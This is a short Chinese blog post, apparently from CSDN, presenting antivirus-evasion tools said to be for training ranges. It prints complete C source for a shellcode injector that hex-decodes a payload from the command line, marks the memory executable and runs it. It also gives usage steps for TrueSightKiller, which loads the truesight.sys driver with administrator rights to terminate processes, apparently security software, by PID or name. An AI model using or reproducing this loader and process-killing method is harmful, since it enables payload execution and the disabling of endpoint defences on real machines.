靶场专用免杀工具

工具
SimpleShellcodeInjector

代码

bash 复制代码
#include <stdio.h>
#include <Windows.h>
int main(int argc, char* argv[]) {
   // HWND hWnd = GetConsoleWindow();
   // ShowWindow( hWnd, SW_HIDE );
    unsigned int char_in_hex;
    char* shellcode = argv[1];
    unsigned int iterations = strlen(shellcode);
    unsigned int memory_allocation = strlen(shellcode) / 2; 
    for (unsigned int i = 0; i < iterations - 1; i++) {
        sscanf(shellcode + 2 * i, "%2X", &char_in_hex);
        shellcode[i] = (char)char_in_hex;
    }
    void* exec = VirtualAlloc(0, memory_allocation, MEM_COMMIT, PAGE_READWRITE);
    memcpy(exec, shellcode, memory_allocation);
    DWORD ignore;
    VirtualProtect(exec, memory_allocation, PAGE_EXECUTE, &ignore);
    (*(void (*)()) exec)();
    return 0;
}

TrueSightKiller

自行编译后,将truesight.sys与编译之后的exe放在同一目录下,以管理员权限运行cmd

-p 指定pid,-n指定进程名


相关推荐
岛屿旅人27 分钟前
涉私数据安全与可控匿名化利用机制研究(上)
网络·人工智能·安全·web安全
wanhengidc36 分钟前
使用云手机进行游戏搬砖划算吗?
运维·服务器·网络·安全·游戏·智能手机
m0_738120721 小时前
CTFshow系列——命令执行web73-77(完结篇)
前端·安全·web安全·网络安全·ctfshow
岛屿旅人2 小时前
涉私数据安全与可控匿名化利用机制研究(下)
网络·人工智能·安全·web安全·生成对抗网络
卡奥斯开源社区官方3 小时前
华为卫星对星引导技术深度解析:原理、实现与开源替代方案
安全
前端世界4 小时前
ASP.NET 实战:用 SqlCommand 打造一个安全的用户注册功能
后端·安全·asp.net
Teamhelper_AR5 小时前
AR技术赋能电力巡检:开启智能安全新时代
安全·ar
Ftrans5 小时前
文档外发管理产品哪个品牌强?安全与效率双优产品推荐
大数据·运维·安全
吱吱企业安全通讯软件5 小时前
吱吱企业通讯软件以安全为核心,构建高效沟通与协作一体化平台
大数据·网络·安全·信息与通信·吱吱办公通讯
慧都小项6 小时前
构建安全的自动驾驶:软件测试中的编码规范与AI验证
人工智能·测试工具·安全·自动驾驶·parasoft